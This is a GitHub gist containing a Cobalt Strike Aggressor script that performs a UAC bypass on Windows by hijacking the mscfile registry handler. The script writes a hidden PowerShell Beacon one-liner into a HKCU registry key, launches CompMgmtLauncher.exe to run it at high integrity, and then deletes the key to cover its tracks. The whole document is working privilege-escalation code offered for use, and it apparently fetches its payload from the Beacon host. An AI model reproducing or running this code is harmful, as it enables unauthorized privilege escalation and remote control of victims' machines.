Skip to content

Instantly share code, notes, and snippets.

@001SPARTaN
Last active March 17, 2017 01:22
Show Gist options
  • Save 001SPARTaN/79d91b15c228d2829434092a18d54cf2 to your computer and use it in GitHub Desktop.
Save 001SPARTaN/79d91b15c228d2829434092a18d54cf2 to your computer and use it in GitHub Desktop.
# CompMgmtLauncher.exe UAC bypass from http://x42.obscurechannel.com/?p=368
sub compMgmtLauncher_exploit {
btask($1, "Task Beacon to run " . listener_describe($2) . " in a high-integrity context.");
$script = artifact($2, "powershell");
$oneliner = beacon_host_script($1, $script);
$oneliner = strrep($oneliner, "IEX ", "");
$cmd = "reg add HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command /d \"";
$cmd .= "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden iex -c " . $oneliner . "\" /f";
bshell($1, $cmd);
bcd($1, "C:\\Windows\\System32");
bpowerpick($1, ".\\CompMgmtLauncher.exe");
bshell($1, "reg delete HKEY_CURRENT_USER\\Software\\Classes\\mscfile /f");
}
beacon_exploit_register("compmgmt", "CompMgmtLauncher UAC bypass", &compMgmtLauncher_exploit);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment